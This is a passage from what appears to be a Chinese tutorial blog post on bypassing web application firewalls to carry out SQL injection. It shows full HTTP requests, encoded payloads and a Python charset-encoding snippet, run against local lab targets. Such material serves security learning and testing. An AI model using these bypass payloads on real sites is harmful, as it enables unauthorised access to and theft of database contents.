Content-Length\uff0c\u518d\u53d1\u9001\u6574\u4e2a\u6570\u636e\u5185\u5bb9\u3002\u8fd9\u6837\u663e\u5f97\u4e0d\u592a\u7075\u6d3b\uff0c\u800c\u4f7f\u7528\u5206\u5757\u7f16\u7801\u5219\u80fd\u5f97\u5230\u6539\u89c2\u3002\u5206\u5757\u4f20\u8f93\u7f16\u7801\u5141\u8bb8\u670d\u52a1\u5668\u5728\u6700\u540e\u53d1\u9001\u6d88\u606f\u5934\u5b57\u6bb5\u3002\u4f8b\u5982\u5728\u5934\u4e2d\u6dfb\u52a0\u6563\u5217\u7b7e\u540d\u3002\u5bf9\u4e8e\u538b\u7f29\u4f20\u8f93\u4f20\u8f93\u800c\u8a00\uff0c\u53ef\u4ee5\u4e00\u8fb9\u538b\u7f29\u4e00\u8fb9\u4f20\u8f93\u3002<\/p>\n<p>\u4e8c\u3001\u5982\u4f55\u4f7f\u7528 chunked \u7f16\u7801<\/p>\n<p>\u5982\u679c\u5728 http \u7684\u6d88\u606f\u5934\u91cc Transfer-Encoding \u4e3a chunked\uff0c\u90a3\u4e48\u5c31\u662f\u4f7f\u7528\u6b64\u79cd\u7f16\u7801\u65b9\u5f0f\u3002<\/p>\n<p>\u63a5\u4e0b\u6765\u4f1a\u53d1\u9001\u6570\u91cf\u672a\u77e5\u7684\u5757\uff0c\u6bcf\u4e00\u4e2a\u5757\u7684\u5f00\u5934\u90fd\u6709\u4e00\u4e2a\u5341\u516d\u8fdb\u5236\u7684\u6570,\u8868\u660e\u8fd9\u4e2a\u5757 \u7684 \u5927 \u5c0f \uff0c \u7136 \u540e \u63a5 CRLF(&quot;rn&quot;) \u3002 \u7136 \u540e \u662f \u6570 \u636e \u672c \u8eab \uff0c \u6570 \u636e \u7ed3 \u675f \u540e \uff0c \u8fd8 \u4f1a \u6709CRLF(&quot;rn&quot;)\u4e24\u4e2a\u5b57\u7b26\u3002\u6709\u4e00\u4e9b\u5b9e\u73b0\u4e2d\uff0c\u5757\u5927\u5c0f\u7684\u5341\u516d\u8fdb\u5236\u6570\u548c CRLF \u4e4b\u95f4\u53ef\u4ee5\u6709\u7a7a\u683c\u3002\u6700\u540e\u4e00\u5757\u7684\u5757\u5927\u5c0f\u4e3a 0\uff0c\u8868\u660e\u6570\u636e\u53d1\u9001\u7ed3\u675f\u3002\u6700\u540e\u4e00\u5757\u4e0d\u518d\u5305\u542b\u4efb\u4f55\u6570\u636e\uff0c\u4f46\u662f\u53ef\u4ee5\u53d1\u9001\u53ef\u9009\u7684\u5c3e\u90e8\uff0c\u5305\u62ec\u6d88\u606f\u5934\u5b57\u6bb5\u3002\u6d88\u606f\u6700\u540e\u4ee5 CRLF \u7ed3\u5c3e\u3002<\/p>\n<p>\u5728\u5934\u90e8\u52a0\u5165 Transfer-Encoding: chunked \u4e4b\u540e\uff0c\u5c31\u4ee3\u8868\u8fd9\u4e2a\u62a5\u6587\u91c7\u7528\u4e86\u5206\u5757\u7f16\u7801\u3002\u8fd9\u65f6\uff0c\u62a5\u6587\u4e2d\u7684\u5b9e\u4f53\u9700\u8981\u6539\u4e3a\u7528\u4e00\u7cfb\u5217\u5206\u5757\u6765\u4f20\u8f93\u3002<\/p>\n<p>\u5206\u5757\u4f20\u8f93 \u4f7f\u7528<\/p>\n<p>\u6bcf\u4e2a\u5206\u5757\u5305\u542b\u5341\u516d\u8fdb\u5236\u7684\u957f\u5ea6\u503c\u548c\u6570\u636e\uff0c\u957f\u5ea6\u503c\u72ec\u5360\u4e00\u884c\uff0c\u957f\u5ea6\u4e0d\u5305\u62ec\u5b83\u7ed3\u5c3e\u7684<\/p>\n<p>CRLF(rn)\uff0c\u4e5f\u4e0d\u5305\u62ec\u5206\u5757\u6570\u636e\u7ed3\u5c3e\u7684 CRLF(rn)\u3002<\/p>\n<p>\u6700\u540e\u4e00\u4e2a\u5206\u5757\u957f\u5ea6\u503c\u5fc5\u987b\u4e3a 0\uff0c\u5bf9\u5e94\u7684\u5206\u5757\u6570\u636e\u6ca1\u6709\u5185\u5bb9\uff0c\u8868\u793a\u5b9e\u4f53\u7ed3\u675f\u3002<\/p>\n<p>\u4f8b\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-http\">HTTP\/1.1 200 OK\nContent-Type: text\/plain\nTransfer-Encoding: chunked\n23rn\nThis is the data in the first chunkrn\n1Arn\nand this is the second onern\n3rn\nconrn\n8rn\nsequencern\n0rn\nrn<\/code><\/pre>\n<p>\u7528 burpsuite \u6293\u5305\u63d0\u4ea4\u5206\u6790 \u9996\u5148\u539f\u751f\u5305 id=1&amp;submit=1 \u67e5\u8be2\u5230\u7528\u6237 id \u4e3a 1 \u7684\u503c<\/p>\n<p>\u4f7f\u7528\u5206\u5757\u4f20\u8f93 \u9996\u5148\u5728 http \u5934\u52a0\u4e0a Transfer-Encoding: chunked \u8868\u793a\u5206\u5757\u4f20\u8f93\u4f20\u9001<\/p>\n<p>\u7b2c\u4e00\u884c\u662f\u957f\u5ea6 \u7b2c\u4e8c\u884c\u662f\u5b57\u7b26\u4e32 0 \u8868\u793a\u4f20\u8f93\u7ed3\u675f \u540e\u9762\u8ddf\u4e0a\u4e24\u4e2a\u7a7a\u683c\u3002<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae66523505.png\" class=\"lazy\" loading=\"lazy\" alt=\"1745993466350-97877f22-bfe9-46d2-a26e-c6a94d1e7d57.png\" \/><\/p>\n<p>\u4e5f\u53ef\u4ee5\u4f7f\u7528 burpsuite \u7684\u63d2\u4ef6 chunked-coding-converter \u8fdb\u884c\u7f16\u7801\u63d0\u4ea4<\/p>\n<p>\u5c06 SQL \u6ce8\u5165\u653b\u51fb\u8bed\u53e5\u7528\u533a\u5757\u4f20\u8f93\u7f16\u7801\u8f6c\u6362\u540e\u63d0\u4ea4\u6210\u529f\u83b7\u53d6\u6570\u636e\u5e93\u7528\u6237\u4fe1\u606f<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae668c7bcd.png\" class=\"lazy\" loading=\"lazy\" alt=\"1745993491864-a1cd360b-fc9e-4854-95c6-c512c02f3474.png\" \/><\/p>\n<h2>\u4fe1\u4efb\u767d\u540d\u5355\u7ed5\u8fc7<\/h2>\n<p>\u6709\u4e9b WAF \u4f1a\u81ea\u5e26\u4e00\u4e9b\u6587\u4ef6\u767d\u540d\u5355\uff0c\u5bf9\u4e8e\u767d\u540d\u5355 waf \u4e0d\u4f1a\u62e6\u622a\u4efb\u4f55\u64cd\u4f5c\uff0c\u6240\u4ee5\u53ef<\/p>\n<p>\u4ee5\u5229\u7528\u8fd9\u4e2a\u7279\u70b9\uff0c\u53ef\u4ee5\u8bd5\u8bd5\u767d\u540d\u5355\u7ed5\u8fc7\u3002<\/p>\n<p>\u767d\u540d\u5355\u901a\u5e38\u6709\u76ee\u5f55<\/p>\n<p>\/admin<\/p>\n<p>\/phpmyadmin<\/p>\n<p>\/admin.php<\/p>\n<p><a href=\"http:\/\/192.168.0.115\/06\/vul\/sqli\/sqli_str.php?a=\/admin.php&amp;name=vince+&amp;submit=1\">http:\/\/192.168.0.115\/06\/vul\/sqli\/sqli_str.php?a=\/admin.php&amp;name=vince+&amp;submit=1<\/a><\/p>\n<p><a href=\"http:\/\/192.168.0.165\/06\/vul\/sqli\/sqli_str.php\/phpmyadmin?name=%27%20union%20select%201,user()--+&amp;submit=1\">http:\/\/192.168.0.165\/06\/vul\/sqli\/sqli_str.php\/phpmyadmin?name=%27%20union%20select%201,user()&#8211;+&amp;submit=1<\/a><\/p>\n<h2>\u9759\u6001\u6587\u4ef6\u7ed5\u8fc7<\/h2>\n<p>\u9664\u4e86\u767d\u540d\u5355\u4fe1\u4efb\u6587\u4ef6\u548c\u76ee\u5f55\u5916\uff0c\u8fd8\u6709\u4e00\u90e8\u5206 waf \u5e76\u4e0d\u4f1a\u5bf9\u9759\u6001\u6587\u4ef6\u8fdb\u884c\u62e6\u622a\u3002\u4f8b\u5982 \u56fe\u7247\u6587\u4ef6 jpg \u3001png \u3001gif \u6216\u8005 css \u3001js \u4f1a\u5bf9\u8fd9\u4e9b\u9759\u6001\u6587\u4ef6\u7684\u64cd\u4f5c\u4e0d\u4f1a\u8fdb\u884c\u68c0\u6d4b\u4ece\u800c\u7ed5\u8fc7 waf \u62e6\u622a\u3002<\/p>\n<p>\/1.jpg&amp;name=vince+&amp;submit=1<\/p>\n<p>\/1.jpg=\/1.jpg&amp;name=vince+&amp;submit=1<\/p>\n<p>\/1.css=\/1.css&amp;name=vince+&amp;submit=1<\/p>\n<h2>pipline\u7ed5\u8fc7<\/h2>\n<p>http \u534f\u8bae\u662f\u7531 tcp \u534f\u8bae\u5c01\u88c5\u800c\u6765\uff0c\u5f53\u6d4f\u89c8\u5668\u53d1\u8d77\u4e00\u4e2a http \u8bf7\u6c42\u65f6\uff0c\u6d4f\u89c8\u5668\u5148\u548c\u670d\u52a1\u5668\u5efa\u7acb\u8d77\u8fde\u63a5 tcp \u8fde\u63a5\uff0c\u7136\u540e\u53d1\u9001 http \u6570\u636e\u5305\uff08\u5373\u6211\u4eec\u7528 burpsuite \u622a\u83b7\u7684\u6570\u636e\uff09\uff0c\u5176\u4e2d\u5305\u542b\u4e86\u4e00\u4e2a Connection \u5b57\u6bb5\uff0c\u4e00\u822c\u503c\u4e3a close\uff0capache \u7b49\u5bb9\u5668\u6839\u636e\u8fd9\u4e2a\u5b57\u6bb5\u51b3\u5b9a\u662f\u4fdd\u6301\u8be5 tcp \u8fde\u63a5\u6216\u662f\u65ad\u5f00\u3002\u5f53\u53d1\u9001\u7684\u5185\u5bb9\u592a\u5927\uff0c\u8d85\u8fc7\u4e00\u4e2a http \u5305\u5bb9\u91cf\uff0c\u9700\u8981\u5206\u591a\u6b21\u53d1\u9001\u65f6\uff0c\u503c\u4f1a\u53d8\u6210 keep-alive\uff0c\u5373\u672c\u6b21\u53d1\u8d77\u7684 http \u8bf7\u6c42\u6240\u5efa\u7acb\u7684 tcp \u8fde\u63a5\u4e0d\u65ad\u5f00\uff0c\u76f4\u5230\u6240\u53d1\u9001\u5185\u5bb9\u7ed3\u675f Connection \u4e3a close \u4e3a\u6b62\u7528 burpsuite \u6293\u5305\u63d0\u4ea4 \u590d\u5236\u6574\u4e2a\u5305\u4fe1\u606f\u653e\u5728\u7b2c\u4e00\u4e2a\u5305\u6700\u540e\uff0c\u628a\u7b2c\u4e00\u4e2a\u5305 close \u6539\u6210 keep-alive \u628a brupsuite \u81ea\u52a8\u66f4\u65b0 Content-Length \u52fe\u53bb\u6389\u3002<\/p>\n<p>\u7b2c\u4e00\u4e2a\u5305\u53c2\u6570\u7684\u5b57\u7b26\u8981\u52a0\u4e0a\u957f\u5ea6\u63a5\u7740\u63d0\u4ea4\u5373\u53ef\u3002\u6709\u4e9b waf \u4f1a\u5339\u914d\u7b2c\u4e8c\u4e2a\u5305\u7684\u6b63\u5c5e\u4e8e\u6b63\u5e38\u53c2\u6570\uff0c\u4e0d\u4f1a\u5bf9\u7b2c\u4e00\u4e2a\u5305\u7684\u53c2\u6570\u8fdb\u884c\u68c0\u6d4b\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u7ed5\u8fc7\u4e00\u4e9b waf \u62e6\u622a\u3002<\/p>\n<h2>\u5229\u7528multipart\/from-data\u7ed5\u8fc7<\/h2>\n<p>\u5728 http \u5934\u91cc\u7684 Content-Type \u63d0\u4ea4\u8868\u5355\u652f\u6301\u4e09\u79cd\u534f\u8bae<\/p>\n<p>application\/x-www-form-urlencoded \u7f16\u7801\u6a21\u5f0f post \u63d0\u4ea4<\/p>\n<p>multipart\/form-data \u6587\u4ef6\u4e0a\u4f20\u6a21\u5f0f<\/p>\n<p>text\/plain \u6587\u672c\u6a21\u5f0f<\/p>\n<p>\u6587\u4ef6\u5934\u7684\u5c5e\u6027 \u662f\u4f20\u8f93\u524d\u5bf9\u63d0\u4ea4\u7684\u6570\u636e\u8fdb\u884c\u7f16\u7801\u53d1\u9001\u5230\u670d\u52a1\u5668\u3002<\/p>\n<p>\u5176\u4e2d multipart\/form-data \u8868\u793a\u8be5\u6570\u636e\u88ab\u7f16\u7801\u4e3a\u4e00\u6761\u6d88\u606f\uff0c\u9875\u4e0a\u7684\u6bcf\u4e2a\u63a7\u4ef6\u5bf9\u5e94\u6d88<\/p>\n<p>\u606f\u4e2d\u7684\u4e00\u4e2a\u90e8\u5206\u3002\u6240\u4ee5\uff0c\u5f53 waf \u6ca1\u6709\u89c4\u5219\u5339\u914d\u8be5\u534f\u8bae\u4f20\u8f93\u7684\u6570\u636e\u65f6\u53ef\u88ab\u7ed5\u8fc7\u3002<\/p>\n<p>Content-Type: multipart\/form-data;<\/p>\n<p>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;28566904301101419271642457175<\/p>\n<p>boundary \u8fd9\u662f\u7528\u6765\u5339\u914d\u7684\u503c<\/p>\n<p>Content-Disposition: form-data; name=&quot;id&quot; \u8fd9\u4e5f\u80fd\u4f5c\u4e3a post \u63d0\u4ea4<\/p>\n<p>\u6240\u4ee5\u7a0b\u5e8f\u4f1a\u63a5\u6536\u5230\u6784\u9020\u7684 SQL \u6ce8\u5165\u8bed\u53e5-1 union select 1,user()<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae66bbf7ca.png\" class=\"lazy\" loading=\"lazy\" alt=\"1745993670811-9d71aeb7-1416-40f1-9e04-38f9a91e3305.png\" \/><\/p>\n<h2>order by \u7ed5\u8fc7<\/h2>\n<p>\u5f53 order by \u88ab\u8fc7\u6ee4\u65f6\uff0c\u65e0\u6cd5\u731c\u89e3\u5b57\u6bb5\u6570\uff0c\u6b64\u65f6\u53ef\u4ee5\u4f7f\u7528 into \u53d8\u91cf\u540d\u8fdb\u884c\u4ee3\u66ff\u3002<\/p>\n<p>select * from users where id=1 into @a,@b,@c,@d;<\/p>\n<h2>http\u76f8\u540c\u53c2\u6570\u8bf7\u6c42\u7ed5\u8fc7<\/h2>\n<p>waf \u5728\u5bf9\u5371\u9669\u5b57\u7b26\u8fdb\u884c\u68c0\u6d4b\u7684\u65f6\u5019\uff0c\u5206\u522b\u4e3a post \u8bf7\u6c42\u548c get \u8bf7\u6c42\u8bbe\u5b9a\u4e86\u4e0d\u540c\u7684\u5339\u914d\u89c4\u5219\uff0c\u8bf7\u6c42\u88ab\u62e6\u622a\uff0c\u53d8\u6362\u8bf7\u6c42\u65b9\u5f0f\u6709\u51e0\u7387\u80fd\u7ed5\u8fc7\u68c0\u6d4b\u3002\u5982\u679c\u7a0b\u5e8f\u4e2d\u80fd\u540c\u65f6\u63a5\u6536get\u3001post \u5982\u679c waf \u53ea\u5bf9 get \u8fdb\u884c\u5339\u914d\u62e6\u622a\uff0c\u6ca1\u6709\u5bf9 post \u8fdb\u884c\u62e6\u622a\u3002<\/p>\n<p>&lt;?php<\/p>\n<p>echo $_REQUEST[&#8216;id&#8217;];<\/p>\n<p>?&gt;<\/p>\n<p>\u6709\u4e9b waf \u53ea\u8981\u5b58\u5728 GET \u6216\u8005 POST \u4f18\u5148\u5339\u914d POST \u4ece\u800c\u5bfc\u81f4\u88ab\u7ed5\u8fc7\u3002<\/p>\n<h2>application\/json\u6216\u8005text\/xml\u7ed5\u8fc7<\/h2>\n<p>\u6709\u4e9b\u7a0b\u5e8f\u662f json \u63d0\u4ea4\u53c2\u6570\uff0c\u7a0b\u5e8f\u4e5f\u662f json \u63a5\u6536\u518d\u62fc\u63a5\u5230 SQL \u6267\u884c json \u683c\u5f0f\u901a\u5e38\u4e0d\u4f1a\u88ab\u62e6\u622a\u3002\u6240\u4ee5\u53ef\u4ee5\u7ed5\u8fc7 waf<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-http\">POST \/06\/vul\/sqli\/sqli_id.php HTTP\/1.1\nHost: 192.168.0.115\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\/20100101 Firefox\/88.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type:application\/json\nContent-Length: 38\nOrigin: http:\/\/192.168.0.115\nConnection: close\nReferer: http:\/\/192.168.0.115\/06\/vul\/sqli\/sqli_id.php\nCookie: PHPSESSID=e6sa76lft65q3fd25bilbc49v3; security_level=0\nUpgrade-Insecure-Requests: 1\n{'id':1 union select 1,2,3,'submit':1}<\/code><\/pre>\n<p>\u540c\u6837 text\/xml \u4e5f\u4e0d\u4f1a\u88ab\u62e6\u622a<\/p>\n<h2>\u8fd0\u884c\u5927\u91cf\u5b57\u7b26\u7ed5\u8fc7<\/h2>\n<p>\u53ef\u4ee5\u4f7f\u7528 select 0xA \u8fd0\u884c\u4e00\u4e9b\u5b57\u7b26\u4ece\u7ed5\u7a81\u7834\u4e00\u4e9b waf \u62e6\u622a<\/p>\n<p>id=1 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)\/<em>!union<\/em>\/\/<em>!select<\/em>\/1,user()<\/p>\n<p>post \u7f16\u7801<\/p>\n<p>1+and+(select+1)%3d(select+0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)\/<em>!union<\/em>\/\/<em>!select<\/em>\/1,user()&amp;submit=1<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-http\">POST \/06\/vul\/sqli\/sqli_id.php HTTP\/1.1\nHost: 192.168.0.165\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\/20100101 Firefox\/88.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 99\nOrigin: http:\/\/192.168.0.165\nConnection: close\nReferer: http:\/\/192.168.0.165\/06\/vul\/sqli\/sqli_id.php\nCookie: PHPSESSID=hk8r159en71pndlu3jvvphenn5\nUpgrade-Insecure-Requests: 1\nid=1+and+(select+1)and+(select+0xA*1000)\/*!union*\/\/*!select*\/+1,user()--+&amp;submit=%E6%9F%A5%E8%AF\n%A2<\/code><\/pre>\n<h2>\u82b1\u62ec\u53f7\u7ed5\u8fc7<\/h2>\n<p>select 1,2 union select{x 1},user()<\/p>\n<p>\u82b1\u62ec\u53f7 \u5de6\u8fb9\u662f\u6ce8\u91ca\u7684\u5185\u5bb9 \u8fd9\u6837\u53ef\u4ee5\u4e00\u4e9b waf \u7684\u62e6\u622a<\/p>\n<h2>\u4f7f\u7528ALL\u6216DISTINCT\u7ed5\u8fc7<\/h2>\n<p>\u53bb\u6389\u91cd\u590d\u503c<\/p>\n<p>select 1,2 from users where user_id=1 union DISTINCT select 1,2<\/p>\n<p>select 1,2 from users where user_id=1 union select DISTINCT 1,2<\/p>\n<p>\u663e\u793a\u5168\u90e8<\/p>\n<p>select 1,2 from users where user_id=1 union all select 1,2<\/p>\n<p>select 1,2 from users where user_id=1 union select all 1,2<\/p>\n<h2>\u6362\u884c\u6df7\u7ed5\u7ed5\u8fc7<\/h2>\n<p>\u76ee\u524d\u5f88\u591a waf \u90fd\u4f1a\u5bf9 union select \u8fdb\u884c\u8fc7\u6ee4\u7684 \u56e0\u4e3a\u4f7f\u7528\u8054\u5408\u67e5\u8be2 \u8fd9\u4e24\u4e2a\u5173\u952e\u8bcd\u662f\u5fc5\u987b\u7684\uff0c\u4e00\u822c\u8fc7\u6ee4\u8fd9\u4e2a\u4e24\u4e2a\u5b57\u7b26 \u60f3\u7528\u8054\u5408\u67e5\u8be2\u5c31\u5f88\u96be\u4e86\u3002<\/p>\n<p>\u53ef\u4ee5\u4f7f\u7528\u6362\u884c \u52a0\u4e0a\u4e00\u4e9b\u6ce8\u91ca\u7b26\u8fdb\u884c\u7ed5\u8fc7\u3002<\/p>\n<h2>\u7f16\u7801\u7ed5\u8fc7<\/h2>\n<p>\u539f\u7406:\u5f62\u5f0f\uff1a\u201c%\u201d\u52a0\u4e0a ASCII \u7801\uff08\u5148\u5c06\u5b57\u7b26\u8f6c\u6362\u4e3a\u4e24\u4f4d ASCII \u7801\uff0c\u518d\u8f6c\u4e3a 16 \u8fdb\u5236\uff09\uff0c\u5176\u4e2d\u52a0\u53f7\u201c+\u201d\u5728 URL \u7f16\u7801\u4e2d\u548c\u201c%20\u201d\u8868\u793a\u4e00\u6837\uff0c\u5747\u4e3a\u7a7a\u683c\u3002\u5f53\u9047\u5230\u975e ASCII \u7801\u8868\u793a\u7684\u5b57\u7b26\u65f6\uff0c\u5982\u4e2d\u6587\uff0c\u6d4f\u89c8\u5668\u6216\u901a\u8fc7\u7f16\u5199 URLEncode\uff0c\u6839\u636e UTF-8\u3001GBK \u7b49\u7f16\u7801 16 \u8fdb\u5236\u5f62\u5f0f\uff0c\u8fdb\u884c\u8f6c\u6362\u3002\u5982\u201c\u6625\u201d\u7684 UTF-8 \u7f16\u7801\u4e3a E6 98A5\uff0c\u56e0\u6b64\u5176\u5728\u652f\u6301 UTF-8 \u7684\u60c5\u51b5\u4e0b\uff0cURL \u7f16\u7801\u4e3a%E6%98%A5\u3002\u503c\u5f97\u6ce8\u610f\u7684\u662f\u91c7\u53d6\u4e0d\u540c\u7684\u4e2d\u6587\u7f16\u7801\uff0c\u4f1a\u6709\u4e0d\u540c\u7684 URL \u7f16\u7801\u3002\u5728 URL \u4f20\u9012\u5230\u540e\u53f0\u65f6\uff0c\u9996\u5148 web \u5bb9\u5668\u4f1a\u81ea\u52a8\u5148\u5bf9 URL \u8fdb\u884c\u89e3\u6790\u3002\u5bb9\u5668\u89e3\u7801\u65f6\uff0c\u4f1a\u6839\u636e\u8bbe\u7f6e\uff08\u5982 jsp \u4e2d\uff0c\u4f1a\u4f7f\u7528 request.setCharacterEncoding(&quot;UTF-8&quot;)\uff09\uff0c\u91c7\u7528UTF-8 \u6216 GBK \u7b49\u5176\u4e2d\u4e00\u79cd\u7f16\u7801\u8fdb\u884c\u89e3\u6790\u3002\u8fd9\u65f6\uff0c\u7a0b\u5e8f\u65e0\u9700\u81ea\u5df1\u518d\u6b21\u89e3\u7801\uff0c\u4fbf\u53ef\u4ee5\u83b7\u53d6\u53c2\u6570\uff08\u5982\u4f7f\u7528 request.getParameter(paramName)\uff09\u3002\u4f46\u662f\uff0c\u6709\u65f6\u4ece\u5ba2\u6237\u7aef\u63d0\u4ea4\u7684 URL \u65e0\u6cd5\u786e\u5b9a\u662f\u4f55\u79cd\u7f16\u7801\uff0c\u5982\u679c\u670d\u52a1\u5668\u9009\u62e9\u7684\u7f16\u7801\u65b9\u5f0f\u4e0d\u5339\u914d\uff0c\u5219\u4f1a\u9020\u6210\u4e2d\u6587\u4e71\u7801\u3002\u4e3a\u4e86\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff0c\u4fbf\u51fa\u73b0\u4e86\u4e8c\u6b21 URLEncode\u7684 \u65b9 \u6cd5 \u3002 \u5728 \u5ba2 \u6237 \u7aef \u5bf9 URL \u8fdb \u884c \u4e24 \u6b21 URLEncode \uff0c \u8fd9 \u6837 \u7c7b \u4f3c \u4e0a \u6587 \u63d0 \u5230\u7684%E6%98%A5 \u5219\u4f1a\u7f16\u7801\u4e3a%25e6%2598%25a5\uff0c\u4e3a\u7eaf ASCII \u7801\u3002Web \u5bb9\u5668\u5728\u63a5\u5230 URL \u540e\uff0c\u81ea\u52a8\u89e3\u6790\u4e00\u6b21\uff0c\u56e0\u4e3a\u4e0d\u7ba1\u5bb9\u5668\u4f7f\u7528\u4f55\u79cd\u7f16\u7801\u8fdb\u884c\u89e3\u6790\uff0c\u90fd\u652f\u6301 ASCII\u7801\uff0c\u4e0d\u4f1a\u51fa\u9519\u3002\u7136\u540e\u5728\u901a\u8fc7\u7f16\u5199\u7a0b\u5e8f\u5bf9\u5bb9\u5668\u89e3\u6790\u540e\u7684\u53c2\u6570\u8fdb\u884c\u89e3\u7801\uff0c\u4fbf\u53ef\u6b63\u786e\u5f97\u5230\u53c2\u6570\u3002\u5728\u8fd9\u91cc\uff0c\u5ba2\u6237\u7aef\u7684\u7b2c\u4e00\u6b21\u7f16\u7801\uff0c\u4ee5\u53ca\u670d\u52a1\u7aef\u7684\u7b2c\u4e8c\u6b21\u89e3\u7801\uff0c\u5747\u662f\u7531\u7a0b\u5e8f\u5458\u81ea\u5df1\u8bbe\u5b9a\u7684\uff0c\u662f\u53ef\u63a7\u7684\uff0c\u53ef\u77e5\u7684\u3002<\/p>\n<p>\u7ed5\u8fc7\uff1a<\/p>\n<p>\u6709\u4e9b waf \u5e76\u672a\u5bf9\u53c2\u6570\u8fdb\u884c\u89e3\u7801\uff0c\u800c\u540e\u9762\u7a0b\u5e8f\u5904\u7406\u4e1a\u52a1\u65f6\u4f1a\u8fdb\u884c\u89e3\u7801\uff0c\u56e0\u6b64\u53ef\u4ee5\u901a\u8fc7\u4e8c\u6b21 url \u7f16\u7801\u7ed5\u8fc7\u3002\u4f8b\u5982\uff1a\u9664\u4e86\u53ef\u4ee5\u628a\u5168\u90e8\u5b57\u7b26\u8f6c\u6362\u4e5f\u53ef\u4ee5\u5355\u72ec\u8f6c\u6362\u5b57\u7b26<\/p>\n<h2>HTTP\u6570\u636e\u7f16\u7801\u7ed5\u8fc7<\/h2>\n<p>\u7f16\u7801\u7ed5\u8fc7\u5728\u7ed5 waf \u4e2d\u4e5f\u662f\u7ecf\u5e38\u9047\u5230\u7684\uff0c\u901a\u5e38 waf \u53ea\u575a\u6301\u4ed6\u6240\u8bc6\u522b\u7684\u7f16\u7801\uff0c\u6bd4\u5982\u8bf4\u5b83\u53ea\u8bc6\u522b utf-8 \u7684\u5b57\u7b26\uff0c\u4f46\u662f\u670d\u52a1\u5668\u53ef\u4ee5\u8bc6\u522b\u6bd4 utf-8 \u66f4\u591a\u7684\u7f16\u7801\u3002\u90a3\u4e48\u6211\u4eec\u53ea\u9700\u8981\u5c06 payload \u6309\u7167 waf \u8bc6\u522b\u4e0d\u4e86\u4f46\u662f\u670d\u52a1\u5668\u53ef\u4ee5\u89e3\u6790\u8bc6\u522b\u7684\u7f16\u7801\u683c\u5f0f\u5373\u53ef\u7ed5\u8fc7\u3002<\/p>\n<p>\u6bd4\u5982\u8bf7\u6c42\u5305\u4e2d\u6211\u4eec\u53ef\u4ee5\u66f4\u6539 Content-Type \u4e2d\u7684 charset \u7684\u53c2\u6570\u503c\uff0c\u6211\u4eec\u6539\u4e3a ibm037\u8fd9\u4e2a\u534f\u8bae\u7f16\u7801\uff0c\u6709\u4e9b\u670d\u52a1\u5668\u662f\u652f\u6301\u7684\u3002payload \u6539\u6210\u8fd9\u4e2a\u534f\u8bae\u683c\u5f0f\u5c31\u884c\u4e86\u3002<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-http\">POST \/06\/vul\/sqli\/sqli_id.php HTTP\/1.1\nHost: 192.168.0.115\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\/20100101\nFirefox\/88.0\nAccept:\ntext\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded;charset:ibm037\nContent-Length: 33\nConnection: close\nCookie: PHPSESSID=e6sa76lft65q3fd25bilbc49v3; security_level=0\nUpgrade-Insecure-Requests: 1<\/code><\/pre>\n<p>%89%84=%F1&amp;%A2%A4%82%94%89%A3=%F1<\/p>\n<p>\u900f\u8fc7 Content-Type \u7684 charset \u7ed5\u8fc7 waf#<\/p>\n<p>\u672a\u7f16\u7801<\/p>\n<p>id=123&amp;pass=pass%3d1<\/p>\n<p>\u900f\u8fc7 IBM037 \u7f16\u7801<\/p>\n<p>%89%84=%F1%F2%F3&amp;%97%81%A2%A2=%97%81%A2%A2~%F1<\/p>\n<p>\u5728\u63d0\u4ea4\u7684 http header<\/p>\n<p>Content-Type: application\/x-www-form-urlencoded; charset=ibm037<\/p>\n<p>import urllib.parse<\/p>\n<p>s = &#8216;id=-1 union select 1,user()&#8211; &amp;submit=1&#8217;<\/p>\n<p>ens=urllib.parse.quote(s.encode(&#8216;ibm037&#8217;))<\/p>\n<p>print(ens)<\/p>\n<h2>url\u7f16\u7801\u7ed5\u8fc7<\/h2>\n<p>\u5728 iis \u91cc\u4f1a\u81ea\u52a8\u628a url \u7f16\u7801\u8f6c\u6362\u6210\u5b57\u7b26\u4e32\u4f20\u5230\u7a0b\u5e8f\u4e2d\u6267\u884c\u3002<\/p>\n<p>\u4f8b\u5982 union select 